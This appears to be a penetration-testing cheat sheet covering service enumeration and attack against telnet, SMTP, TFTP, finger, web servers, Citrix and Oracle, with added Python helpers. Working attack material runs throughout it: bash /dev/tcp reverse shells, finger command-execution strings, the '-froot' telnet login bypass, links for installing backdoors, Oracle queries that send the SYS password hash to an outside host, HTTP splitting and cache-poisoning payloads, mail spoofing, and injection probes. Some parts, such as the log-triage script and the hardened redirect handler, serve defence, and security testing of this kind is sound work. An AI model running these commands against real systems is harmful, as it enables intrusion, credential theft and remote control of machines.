Fingerprint server
telnet ip_address
Common Banner List (OS: banner)
Solaris 8: SunOS 5.8
Solaris 2.6: SunOS 5.6
Solaris 2.4 or 2.5.1: Unix(r) System V Release 4.0 (hostname)
SunOS 4.1.x: SunOS Unix (hostname)
FreeBSD: FreeBSD/i386 (hostname) (ttyp1)
NetBSD: NetBSD/i386 (hostname) (ttyp1)
OpenBSD: OpenBSD/i386 (hostname) (ttyp1)
Red Hat 8.0: Red Hat Linux release 8.0 (Psyche)
Debian 3.0: Debian GNU/Linux 3.0 / hostname
SGI IRIX 6.x: IRIX (hostname)
IBM AIX 4.1.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
IBM AIX 4.2.x or 4.3.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
Nokia IPSO: IPSO (hostname) (ttyp0)
Cisco IOS: User Access Verification
Livingston ComOS: ComOS - Livingston PortMaster
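Added example (not part of the original cheat sheet): a small telnet banner grabber that refuses the server's option negotiation (IAC DO -> WONT, IAC WILL -> DONT) so the login banner is actually sent, then matches it against the banner list above. A raw telnet stream is easy to misread because the negotiation bytes arrive mixed with the banner; stripping them first is the step a plain `telnet ip_address` hides from you. The sample stream and the `grab_telnet_banner` host/port are constructed for illustration.

```python
import socket

# Banner fragments from the list above, checked in order (first match wins);
# the more specific SunOS 5.x strings come before the generic SunOS 4 one.
BANNER_SIGNATURES = [
    ("SunOS 5.8", "Solaris 8"),
    ("SunOS 5.6", "Solaris 2.6"),
    ("Unix(r) System V Release 4.0", "Solaris 2.4 or 2.5.1"),
    ("SunOS Unix", "SunOS 4.1.x"),
    ("FreeBSD/", "FreeBSD"),
    ("NetBSD/", "NetBSD"),
    ("OpenBSD/", "OpenBSD"),
    ("Red Hat Linux release 8.0", "Red Hat 8.0"),
    ("Debian GNU/Linux 3.0", "Debian 3.0"),
    ("IRIX", "SGI IRIX 6.x"),
    ("AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.", "IBM AIX 4.1.x"),
    ("AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.", "IBM AIX 4.2.x or 4.3.x"),
    ("IPSO", "Nokia IPSO"),
    ("User Access Verification", "Cisco IOS"),
    ("ComOS - Livingston PortMaster", "Livingston ComOS"),
]

# RFC 854 command bytes
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240

def strip_telnet_negotiation(data):
    """Remove IAC option negotiation from a telnet stream.
    Returns (printable_text, replies): replies refuses every option the server
    proposed (DO -> WONT, WILL -> DONT), which is enough to make most servers
    move on and print their banner."""
    text = bytearray()
    replies = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            text.append(b)
            i += 1
            continue
        if i + 1 >= len(data):
            break
        cmd = data[i + 1]
        if cmd == IAC:                       # escaped 0xff data byte
            text.append(IAC)
            i += 2
        elif cmd == SB:                      # subnegotiation: skip to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        elif cmd in (DO, DONT, WILL, WONT) and i + 2 < len(data):
            opt = data[i + 2]
            if cmd == DO:
                replies += bytes([IAC, WONT, opt])
            elif cmd == WILL:
                replies += bytes([IAC, DONT, opt])
            i += 3
        else:                                # other two-byte command
            i += 2
    return text.decode("latin-1"), bytes(replies)

def fingerprint_banner(banner):
    """Map banner text to an OS guess using the table above."""
    for needle, os_name in BANNER_SIGNATURES:
        if needle in banner:
            return os_name
    return "unknown"

def grab_telnet_banner(host, port=23, timeout=5.0):
    """Live grab: connect, refuse negotiation, return the banner text seen
    before the login prompt (host and port are whatever you are testing)."""
    collected = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        for _ in range(4):
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            text, replies = strip_telnet_negotiation(chunk)
            if replies:
                s.sendall(replies)
            collected += text.encode("latin-1")
            if b"login:" in collected.lower() or b"password:" in collected.lower():
                break
    return collected.decode("latin-1")

# Constructed sample stream: IAC DO ECHO, IAC WILL SUPPRESS-GO-AHEAD, then a
# Solaris 8 style banner (not captured from a real host).
SAMPLE_STREAM = bytes([IAC, DO, 1, IAC, WILL, 3]) + b"\r\nSunOS 5.8\r\n\r\nlogin: "

if __name__ == "__main__":
    text, replies = strip_telnet_negotiation(SAMPLE_STREAM)
    print(repr(text), "->", fingerprint_banner(text))
```

Banner matching is a hint, not proof: banners are trivially changed in /etc/issue.net or the telnet service configuration, so confirm with TCP/IP stack fingerprinting before relying on the result.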
telnetfp
Password Attack
Common passwords
Hydra brute force
Brutus
telnet -l "-froot" hostname (Solaris 10 and OpenSolaris before the 2007 patch, CVE-2007-0882: the -f value is passed straight through to login(1), which treats it as a pre-authenticated user and skips the password prompt)
Examine configuration files
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
Fingerprint server
telnet ip_address 25 (banner grab)
Mail Server Testing
Enumerate users
VRFY username (asks the server to confirm that a mailbox exists - account enumeration)
EXPN alias (asks the server to expand a mailing list or alias into its member addresses - account enumeration)
Mail Spoof Test
HELO anything
MAIL FROM: spoofed_address
RCPT TO: valid_mail_account
DATA
(message text)
.
QUIT
Mail Relay Test
HELO anything
Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
Unknown domain - mail from: <user@unknown_domain>
Domain not present - mail from: <user@localhost>
Domain not supplied - mail from: <user>
Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
Use double quotes - mail from: <user@domain> rcpt to: <"user@recipient-domain">
Use IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
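Added example (not from the original page): the relay probes above driven from a script rather than typed by hand. Each probe issues MAIL FROM / RCPT TO and records the reply code; a 2xx to an external recipient is the relay indicator, and DATA is never sent, so no message actually leaves the server. For offline use it is wired to a constructed fake MTA that has the classic bug of treating any address containing its own domain or IP literal as local. The domains, IP address and fake server are assumptions for the demo; against a real target pass a connected socket to `relay_test`.

```python
import socket
import threading

# The relay probes listed above. {t} = the target's own mail domain,
# {r} = an external recipient domain, {ip} = the target's IP address.
RELAY_PROBES = [
    ("identical to/from",       "<nobody@{t}>",          "<nobody@{t}>"),
    ("unknown domain",          "<user@unknown_domain>", "<nobody@{r}>"),
    ("domain not present",      "<user@localhost>",      "<nobody@{r}>"),
    ("domain not supplied",     "<user>",                "<nobody@{r}>"),
    ("source address omission", "<>",                    "<nobody@{r}>"),
    ("target IP as sender",     "<user@{ip}>",           "<nobody@{r}>"),
    ("quoted recipient",        "<user@{t}>",            '<"user@{r}">'),
    ("target IP route",         "<user@{t}>",            "<nobody@{r}@[{ip}]>"),
    ("source-route form",       "<user@[{ip}]>",         "<@{t}:nobody@{r}>"),
    ("bang-path form",          "<user@[{ip}]>",         "<{r}!nobody@[{ip}]>"),
]

def read_reply(rfile):
    """Read one (possibly multi-line) SMTP reply and return its 3-digit code."""
    while True:
        line = rfile.readline()
        if not line:
            raise ConnectionError("server closed the connection")
        if line[3:4] != b"-":           # "250-..." continues, "250 ..." ends
            return int(line[:3])

def smtp_cmd(sock, rfile, command):
    sock.sendall(command.encode("ascii") + b"\r\n")
    return read_reply(rfile)

def relay_test(sock, target_domain, recipient_domain, target_ip):
    """Run every probe on an already-connected socket; return {probe: code}.
    A 2xx means the recipient was accepted. Caveat: some MTAs only refuse
    relaying at DATA time, so a 250 here is a finding to confirm, not proof."""
    fmt = dict(t=target_domain, r=recipient_domain, ip=target_ip)
    rfile = sock.makefile("rb")
    read_reply(rfile)                                     # 220 banner
    smtp_cmd(sock, rfile, "HELO anything")
    results = {}
    for name, mail_from, rcpt_to in RELAY_PROBES:
        smtp_cmd(sock, rfile, "RSET")
        code = smtp_cmd(sock, rfile, "MAIL FROM: " + mail_from.format(**fmt))
        if code // 100 == 2:
            code = smtp_cmd(sock, rfile, "RCPT TO: " + rcpt_to.format(**fmt))
        results[name] = code
    smtp_cmd(sock, rfile, "QUIT")
    return results

def fake_mta(sock, local_domain, ip):
    """Constructed target for offline use: accepts a recipient if the local
    domain or its own IP literal appears anywhere in the address, which is the
    mistake the source-route, bang-path and @[IP] probes are designed to hit."""
    rfile = sock.makefile("rb")
    sock.sendall(b"220 mail.example.test ESMTP\r\n")
    while True:
        line = rfile.readline()
        if not line:
            break
        cmd = line.decode("ascii", "replace").strip()
        verb = cmd.split(" ", 1)[0].upper()
        if verb == "QUIT":
            sock.sendall(b"221 bye\r\n")
            break
        if verb == "RCPT":
            addr = cmd.split(":", 1)[1].strip().lower()
            local = ("@" + local_domain) in addr or ("[" + ip + "]") in addr
            sock.sendall(b"250 ok\r\n" if local else b"554 relay access denied\r\n")
        else:
            sock.sendall(b"250 ok\r\n")
    sock.close()

def run_demo():
    """Wire the client to the constructed MTA over a socketpair (no network)."""
    client, server = socket.socketpair()
    t = threading.Thread(target=fake_mta, args=(server, "example.test", "192.0.2.10"), daemon=True)
    t.start()
    try:
        return relay_test(client, "example.test", "external.test", "192.0.2.10")
    finally:
        client.close()
        t.join(2)

if __name__ == "__main__":
    for name, code in run_demo().items():
        print("%-25s %d %s" % (name, code, "ACCEPTED" if code // 100 == 2 else "rejected"))
```

Against the fake MTA the source-route, bang-path and @[IP] forms are accepted while the plain external recipient is refused, which is exactly the pattern to look for on a real target: the server is not an open relay in the obvious sense, but its address parsing can still be abused to relay.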
Examine Configuration Files
sendmail.cf
submit.cf
Fingerprint server/ service
host
host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
-v verbose output
-t type: query a specific record type, e.g. A, NS, MX or PTR
-a same as -t ANY
-l zone transfer (AXFR), if the server allows it
-f file: save output to the named file (older host implementations only; not present in BIND 9 host)
nslookup
nslookup [ -option ... ] [ host-to-find | - [ server ]]
dig
dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
whois
-h host  Use the named host to resolve the query
-a  Use ARIN to resolve the query
-r  Use RIPE to resolve the query
-p  Use APNIC to resolve the query
-Q  Perform a quick lookup
DNS Enumeration
Bile Suite
perl BiLE.pl [website] [project_name]
perl BiLE-weigh.pl [website] [input file]
perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
perl vet-mx.pl [input file] [true domain file] [output file]
perl exp-tld.pl [input file] [output file]
perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
perl qtrace.pl [ip_address_file] [output_file]
perl jarf-rev [subnetblock] [nameserver]
txdns
txdns -rt -t domain_name
txdns -x 50 -bb domain_name
txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt
Examine Configuration Files
host.conf
resolv.conf
named.conf
TFTP Enumeration
tftp ip_address PUT local_file
tftp ip_address GET conf.txt (or other files)
Solarwinds TFTP server
tftp -i <IP> GET /etc/passwd (old Solaris; -i is the Windows tftp.exe binary-mode flag)
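Added example (not part of the original page): a minimal RFC 1350 TFTP read client, which is what the `tftp ... GET conf.txt` lines above do under the hood. TFTP has no authentication at all, so reading a device config is purely a matter of guessing the filename; the code shows the three things a hand-typed client hides: the server answers from a fresh ephemeral port (its transfer ID) that must be tracked, every DATA block has to be ACKed, and duplicates must be re-ACKed without being appended. The sample packets are constructed, not captured from a device; `tftp_get` is the live path.

```python
import socket
import struct

RRQ, WRQ, DATA, ACK, ERROR = 1, 2, 3, 4, 5
BLOCK = 512

def build_rrq(filename, mode="octet"):
    """RFC 1350 read request: opcode 1, filename, NUL, mode, NUL."""
    return struct.pack("!H", RRQ) + filename.encode() + b"\0" + mode.encode() + b"\0"

def build_ack(block):
    return struct.pack("!HH", ACK, block)

def parse_packet(pkt):
    """Return (opcode, block number or error code, remaining bytes)."""
    if len(pkt) < 4:
        raise ValueError("short TFTP packet")
    op, num = struct.unpack("!HH", pkt[:4])
    return op, num, pkt[4:]

class TftpTransfer:
    """Reassembles a file from DATA packets. The transfer ends on a block shorter
    than 512 bytes or on an ERROR packet. Block numbers wrap at 65535."""
    def __init__(self):
        self.expected = 1
        self.data = bytearray()
        self.done = False
        self.error = None

    def feed(self, pkt):
        """Process one received packet and return the ACK to send, or None."""
        op, num, payload = parse_packet(pkt)
        if op == ERROR:
            self.error = (num, payload.rstrip(b"\0").decode("ascii", "replace"))
            self.done = True
            return None
        if op != DATA:
            return None
        if num != self.expected:
            # duplicate or stray block: re-ACK the last good block, append nothing
            return build_ack((self.expected - 1) & 0xFFFF)
        self.data += payload
        if len(payload) < BLOCK:
            self.done = True
        self.expected = (self.expected + 1) & 0xFFFF
        return build_ack(num)

def tftp_get(host, filename, port=69, timeout=3.0):
    """Live use: fetch a file over UDP from a TFTP server you are testing."""
    transfer = TftpTransfer()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_rrq(filename), (host, port))
        peer = None
        while not transfer.done:
            pkt, addr = s.recvfrom(4 + BLOCK)
            if peer is None:
                peer = addr            # server replies from its own ephemeral port (TID)
            elif addr != peer:
                continue               # ignore packets from any other source
            reply = transfer.feed(pkt)
            if reply:
                s.sendto(reply, peer)
    if transfer.error:
        raise IOError("TFTP error %d: %s" % transfer.error)
    return bytes(transfer.data)

# Constructed server packets: a 529-byte file sent as one full block plus a
# short final block, and a file-not-found error (error code 1).
SAMPLE_DATA = [
    struct.pack("!HH", DATA, 1) + b"A" * BLOCK,
    struct.pack("!HH", DATA, 2) + b"hostname router1\n",
]
SAMPLE_ERROR = struct.pack("!HH", ERROR, 1) + b"File not found\0"

if __name__ == "__main__":
    t = TftpTransfer()
    for pkt in SAMPLE_DATA:
        t.feed(pkt)
    print(len(t.data), "bytes:", bytes(t.data[-17:]))
```

Filename guessing is the whole game here: router and switch configs are usually `startup-config`, `running-config` or `<hostname>-confg`, and the TFTP bruteforcers listed below simply iterate such lists through the same RRQ exchange.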
TFTP Bruteforcing
TFTP bruteforcer
Cisco-Torch
User enumeration
finger 'a b c d e f g h' @example.com
finger admin@example.com
finger user@example.com
finger 0@example.com
finger .@example.com
finger **@example.com
finger test@example.com
finger @example.com
Command execution
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
finger user@host@victim
finger @internal@external
Fingerprint server
telnet ip_address port
Firefox plugins
All
firecat
Specific
add n edit cookies
asnumber
header spy
live http headers
shazou
web developer
Crawl website
lynx [options] startfile/URL
Options include: -traversal, -crawl, -dump, -image_links, -source
httprint
Metagoofil
metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
Web Directory enumeration
Nikto
nikto [-h target] [options]
DirBuster
Wikto
Goolag Scanner
Vulnerability Assessment
Manual Tests
Default Passwords
Install Backdoors
ASP
http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
Assorted
http://michaeldaw.org/projects/web-backdoor-compilation/
http://open-labs.org/hacker_webkit02.tar.gz
Perl
http://home.arcor.de/mschierlm/test/pmsh.pl
http://pentestmonkey.net/tools/perl-reverse-shell/
http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
PHP
http://php.spb.ru/remview/
http://pentestmonkey.net/tools/php-reverse-shell/
http://pentestmonkey.net/tools/php-findsock-shell/
Python
http://matahari.sourceforge.net/
TCL
http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
Bash Connect Back Shell
GnuCitizen
Attack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Neohapsis
Attack Box: nc -l -p Port -vvv
Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
Method Testing
nc IP_Address Port
HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
PROPFIND / HTTP/1.0
TRACE / HTTP/1.1
PUT http://Target_URL/FILE_NAME
POST http://Target_URL/FILE_NAME HTTP/1.x
Upload Files
curl
curl -u <username:password> -T file_to_upload <Target_URL>
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
put.pl
put.pl -h target -r /remote_file_name -f local_file_name
webdav
cadaver
View Page Source
Hidden Values
Developer Remarks
Extraneous Code
Passwords!
Input Validation Checks
NULL or null
Possible error messages returned.
' , " , ; , <!
Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
- , = , + , "
Used to craft SQL Injection queries.
' , & , ! , | , < , >
Used to find command execution vulnerabilities.
"><script>alert(1)</script>
Basic Cross-Site Scripting Checks.
%0d%0a
Carriage Return (%0d) Line Feed (%0a)
HTTP Splitting
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>
Decoded, the injected value closes the real response with an empty body and then supplies a complete second response that a proxy, cache or browser reads as the server's next answer:
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 47

<html>blah</html>
Cache Poisoning
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>
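Added example (not from the original page) covering both the HTTP splitting and the cache poisoning payloads above: a builder that produces the encoded parameter, a constructed vulnerable redirect handler that reflects it into a Location header, a parser that reads the resulting byte stream the way a naive proxy or cache does (so you can see the second, attacker-authored response appear), and the hardened handler that refuses CR/LF in header values. The handler, paths and the `/home?language=` parameter are assumptions for the demo.

```python
from urllib.parse import quote, unquote

def build_split_payload(param_value, body, status="200 OK", extra_headers=()):
    """URL-encoded parameter value in the form used above: CRLF, a
    Content-Length: 0 that closes the real response, then a complete second
    response under the attacker's control (status and extra headers selectable,
    e.g. 304 Not Modified plus Last-Modified for the cache poisoning variant)."""
    second = "HTTP/1.1 %s\r\nContent-Type: text/html\r\n" % status
    for header in extra_headers:
        second += header + "\r\n"
    second += "Content-Length: %d\r\n\r\n%s" % (len(body.encode("latin-1")), body)
    return quote(param_value + "\r\nContent-Length: 0\r\n\r\n" + second, safe="")

def vulnerable_redirect(language):
    """Constructed vulnerable handler: decodes the parameter and reflects it
    into the Location header without removing CR/LF."""
    value = unquote(language)
    return ("HTTP/1.1 302 Found\r\nLocation: /home?language=%s\r\n\r\n" % value).encode("latin-1")

def safe_redirect(language):
    """Hardened handler: reject control characters in the value and re-encode it
    so exactly one header line is emitted."""
    value = unquote(language)
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value")
    return ("HTTP/1.1 302 Found\r\nLocation: /home?language=%s\r\n\r\n"
            % quote(value, safe="")).encode("latin-1")

def is_rejected(handler, language):
    """True if the handler refuses the parameter instead of emitting it."""
    try:
        handler(language)
    except ValueError:
        return True
    return False

def parse_responses(stream):
    """Split a byte stream as a naive proxy or cache does: one response per
    status line, body length taken from Content-Length.
    Returns a list of (status line, {header: value}, body)."""
    responses = []
    while True:
        stream = stream.lstrip(b"\r\n")
        if not stream.startswith(b"HTTP/"):
            break
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep:
            break
        lines = head.decode("latin-1").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, val = line.partition(":")
            headers[name.strip().lower()] = val.strip()
        length = int(headers.get("content-length", "0"))
        responses.append((lines[0], headers, rest[:length].decode("latin-1")))
        stream = rest[length:]
    return responses

BODY = "<html>Insert undesirable content here</html>"

def demo():
    """Feed the splitting payload through the vulnerable handler and parse what
    comes out: the legitimate 302 followed by the injected 200."""
    payload = build_split_payload("foobar", BODY)
    return parse_responses(vulnerable_redirect(payload))

if __name__ == "__main__":
    for status, headers, body in demo():
        print(status, headers, repr(body))
```

The cache poisoning variant only differs in the second response: a 304 with a Last-Modified header tells an intermediary cache to pair the injected body with the next request it has queued, which is why the encoded payload above carries those two headers.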
%7f , %ff
byte-length overflows; maximum 7- and 8-bit values.
-1, other
Integer and underflow vulnerabilities.
%n , %x , %s
Testing for format string vulnerabilities.
../
Directory Traversal Vulnerabilities.
% , _, *
Wildcard characters can sometimes present DoS issues or information disclosure.
Ax1024+
Overflow vulnerabilities.
Automated table and column iteration
orderby.py
./orderby.py www.site.com/index.php?id=
d3sqlfuzz.py
./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
Vulnerability Scanners
Acunetix
Grendelscan
NStealth
Obiwan III
w3af
Specific Applications/ Server Tools
Domino
dominoaudit
dominoaudit.pl [options] -h <IP>
Joomla
cms_few
./cms.py <site-name>
joomsq
./joomsq.py <IP>
joomlascan
./joomlascan.py <site> [options]
-p/-proxy <host:port>  Add proxy support
-404  Don't show 404 responses
joomscan
./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
jscan
jscan.pl -f hostname
(shell.txt required)
aspaudit.pl
asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
Vbulletin
vbscan.py
vbscan.py <host> <port> -v
vbscan.py -update
ZyXel
zyxel-bf.sh
snmpwalk
snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
snmpget
snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
Proxy Testing
Burpsuite
Crowbar
Interceptor
Paros
Requester Raw
Suru
WebScarab
Examine configuration files
Generic
Examine httpd.conf/ windows config files
JBoss
JMX Console http://<IP>:8080/jmx-console/
War File
Joomla
configuration.php
diagnostics.php
joomla.inc.php
config.inc.php
Mambo
configuration.php
config.inc.php
Wordpress
setup-config.php
wp-config.php
ZyXel
/WAN.html (contains PPPoE ISP password)
/WLAN_General.html and /WLAN.html (contains WEP key)
/rpDyDNS.html (contains DDNS credentials)
/Firewall_DefPolicy.html (Firewall)
/CF_Keyword.html (Content Filter)
/RemMagWWW.html (Remote MGMT)
/rpSysAdmin.html (System)
/LAN_IP.html (LAN_IPN)
/NAT_General.html (NAT)
/ViewLog.html (Logs)
/rpFWUpload.html (Tools)
/DiagGeneral.html (Diagnostic)
/RemMagSNMP.html (SNMP Passwords)
/LAN_ClientList.html (Current DHCP Leases)
Config Backups
/RestoreCfg.html
/BackupCfg.html
Note: the above config backups are not human readable; the following tool is required to extract admin credentials and other important settings from them
ZyXEL Config Reader
Examine web server logs
c:\winnt\system32\Logfiles\W3SVC1
awk -F " " '{print $3,$11}' filename | sort | uniq
(column numbers depend on the #Fields: line at the top of the log; check it before trusting $3 and $11)
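Added example (not part of the original page): a log triage script that reads the column names from the W3C `#Fields:` directive instead of hard-coding positions like the awk one-liner, then summarises client/status pairs and flags requests matching the input validation probes from earlier in this page (traversal, SQL injection, script tags) plus write methods such as PUT. The log excerpt is constructed to look like IIS 6 default output; it is not from a real server.

```python
import re
from collections import Counter

# Constructed IIS 6 W3C extended log excerpt with the default field set
# (not taken from a real server).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2008-03-01 00:00:01
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2008-03-01 00:00:01 10.0.0.5 GET /index.asp - 80 - 198.51.100.7 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2008-03-01 00:00:02 10.0.0.5 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 80 - 203.0.113.9 Mozilla/4.0 404 0 2
2008-03-01 00:00:03 10.0.0.5 GET /login.asp user=admin'+OR+1=1-- 80 - 203.0.113.9 Mozilla/4.0 500 0 0
2008-03-01 00:00:04 10.0.0.5 PUT /shell.asp - 80 - 203.0.113.9 Mozilla/4.0 201 0 0
2008-03-01 00:00:05 10.0.0.5 GET /search.asp q=%3Cscript%3Ealert(1)%3C/script%3E 80 - 198.51.100.7 Mozilla/4.0 200 0 0
"""

def parse_w3c(text):
    """Yield one dict per entry, taking column names from the #Fields: directive.
    Fixed column positions silently break when the logged field set has been
    changed in IIS Manager; this does not."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split(":", 1)[1].split()
            continue
        if fields is None:
            raise ValueError("log entry before any #Fields: directive")
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue                      # skip a malformed line rather than misalign columns
        yield dict(zip(fields, parts))

# Signatures for the probes from the input validation list above.
SUSPECT = [
    ("traversal", re.compile(r"\.\.(/|\\|%2f|%5c|%255c)", re.I)),
    ("sqli",      re.compile(r"('|%27)[+\s]*(or|and|union)\b", re.I)),
    ("xss",       re.compile(r"<script|%3cscript", re.I)),
]
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

def summarize(entries):
    """Return (Counter of (client IP, status), list of (client IP, label, uri-stem))."""
    entries = list(entries)
    by_client_status = Counter((e["c-ip"], e["sc-status"]) for e in entries)
    alerts = []
    for e in entries:
        target = e["cs-uri-stem"] + "?" + e["cs-uri-query"]
        for label, rx in SUSPECT:
            if rx.search(target):
                alerts.append((e["c-ip"], label, e["cs-uri-stem"]))
        if e["cs-method"].upper() in WRITE_METHODS:
            alerts.append((e["c-ip"], "write-method:" + e["cs-method"], e["cs-uri-stem"]))
    return by_client_status, alerts

if __name__ == "__main__":
    counts, alerts = summarize(parse_w3c(SAMPLE_LOG))
    for (ip, status), n in sorted(counts.items()):
        print(ip, status, n)
    for a in alerts:
        print("ALERT", *a)
```

IIS writes the query string as a separate column and replaces spaces with `+`, so the signatures have to be run over stem and query together and must tolerate both raw and percent-encoded forms (the `%255c` double-encoding in the sample is the classic IIS traversal variant).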
References
White Papers
Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
Blind Security Testing - An Evolutionary Approach
Command Injection in XML Signatures and Encryption
Input Validation Cheat Sheet
SQL Injection Cheat Sheet
Books
Hacking Exposed Web 2.0
Hacking Exposed Web Applications
The Web Application Hacker's Handbook
Exploit Frameworks
Brute-force Tools
Acunetix
Metasploit
w3af
Citrix Enumeration
Default Domain
Published Applications
./citrix-pa-scan {IP_address/file | - | random} [timeout]
citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
Citrix Brute Force
bforce.js
connect.js
Citrix Brute-forcer
Reference Material
Hacking Citrix - the legitimate backdoor
Hacking Citrix - the forceful way
Oracle Enumeration
oracsec
Repscan
Sidguess
Scuba
DNS/HTTP Enumeration
SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
WinSID
Oracle default password list
TNSVer
tnsver host [port]
TCP Scan
Oracle TNSLSNR
Will respond to: ping, version, status, service, change_password, help, reload, save_config, set log_directory, set display_mode, set log_file, show, spawn, stop
TNSCmd
perl tnscmd.pl -h ip_address
perl tnscmd.pl version -h ip_address
perl tnscmd.pl status -h ip_address
perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
LSNrCheck
Oracle Security Check (needs credentials)
OAT
sh opwg.sh -s ip_address
opwg.bat -s ip_address
sh oquery.sh -s ip_address -u username -p password -d SID
c:\oquery -s ip_address -u username -p password -d SID
OScanner
sh oscanner.sh -s ip_address
oscanner.exe -s ip_address
sh reportviewer.sh oscanner_saved_file.xml
reportviewer.exe oscanner_saved_file.xml
NGS Squirrel for Oracle
Service Register
Service-register.exe ip_address
PLSQL Scanner 2008
Oracle Brute Force
OAK
ora-getsid hostname port sid_dictionary_list
ora-auth-alter-session host port sid username password sql
ora-brutesid host port start
ora-pwdbrute host port sid username password-file
ora-userenum host port sid userlistfile
ora-ver -e (-f -l -a) host port
breakable (Targets Application Server Port)
breakable.exe host url [port] [v]
host  IP address of the Oracle Portal Server
url   PATH_INFO, i.e. /pls/orasso
port  TCP port the Oracle Portal Server is serving pages from
v     verbose
SQLInjector (Targets Application Server Port)
sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
Check Password
orabf
orabf [hash]:[username] [options]
thc-orakel
Cracker
Client
Crypto
DBVisualisor
Sql scripts from pentest.co.uk
Manual SQL input of previously reported vulnerabilities
Oracle Reference Material
Understanding SQL Injection
SQL Injection walkthrough
SQL Injection by example
Advanced SQL Injection in Oracle databases
Blind SQL Injection
SQL Cheatsheets
http://ha.ckers.org/sqlinjection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://www.0x000000.com/?i=14
http://pentestmonkey.net/
NFS Enumeration
showmount -e hostname/ip_address
mount -t nfs ip_address:/directory_found_exported /local_mount_point
NFS Brute Force
Interact with NFS share and try to add/delete
Exploit and Confuse Unix
Examine Configuration Files
/etc/exports
/etc/lib/nfs/xtab
HP Enumeration
Authentication Method
Host OS Authentication
Default Authentication
Default Passwords
Wikto
